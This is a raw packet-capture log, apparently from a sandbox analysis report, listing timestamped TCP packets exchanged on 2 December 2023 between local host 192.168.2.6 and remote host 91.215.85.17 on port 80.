                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483186007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483196020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483201027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483211994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483221054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483222961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483236074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483247042 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483247042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483262062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483266115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483273983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483283997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483285904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483302116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483328104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.679954052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.679980993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.679995060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.680089951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698291063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698307991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698318005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698328972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698339939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698352098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698373079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698421955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698435068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698470116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.698548079 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709047079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709064960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709078074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709089994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709100008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709111929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709116936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709122896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709134102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709144115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709153891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709172964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709177971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709189892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709237099 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709260941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709268093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709273100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709285975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709295988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709342003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709351063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709355116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709364891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709376097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709422112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709433079 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709444046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709456921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709500074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709501982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709563017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709573030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709588051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709598064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709610939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709616899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709628105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709636927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709646940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709665060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709727049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709731102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709784031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709790945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709884882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709945917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709959030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709969044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709981918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709988117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.709995985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710005999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710017920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710027933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710032940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710040092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710045099 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710055113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710064888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710074902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710086107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710095882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710104942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710114956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710124969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710148096 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710187912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710200071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710208893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710217953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710222960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710230112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710236073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710252047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710262060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710273027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710283041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710292101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710295916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710304022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710365057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710428953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710442066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710455894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710465908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710474968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710484982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710495949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710501909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710510969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710516930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710517883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710522890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710536957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710549116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710586071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710627079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710675955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710715055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710781097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710797071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710807085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710818052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710856915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710879087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710886002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710900068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710901976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710957050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710971117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710982084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.710983038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711024046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711035967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711040974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711041927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711057901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711067915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711077929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711114883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711127996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711139917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711149931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711159945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711213112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711237907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711249113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711260080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711318016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711328030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711369038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711395025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711409092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711422920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711441040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711505890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711518049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711529016 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711532116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711543083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711553097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711560011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711570024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.711647987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.747555017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.758621931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.905611038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.905630112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.905644894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.905747890 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.905864000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923881054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923897982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923909903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923923016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923935890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923947096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923949003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923958063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.923990965 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.924007893 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.924096107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.924108982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.924148083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934740067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934755087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934767008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934778929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934802055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934822083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934823990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934844017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934861898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934863091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934885025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934912920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934921980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934923887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934937000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934967995 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.934999943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935013056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935024023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935034990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935055017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935092926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935570955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935584068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935594082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935604095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935627937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935638905 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935638905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935651064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935666084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935703993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935717106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935729980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935740948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935750961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935762882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935774088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935782909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935785055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935795069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935802937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935810089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935810089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935847998 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935853958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935864925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935875893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935887098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935899019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935906887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935928106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935939074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935970068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935971975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.935983896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936019897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936055899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936069965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936101913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936104059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936115980 CET804972091.215.85.17192.168.2.6
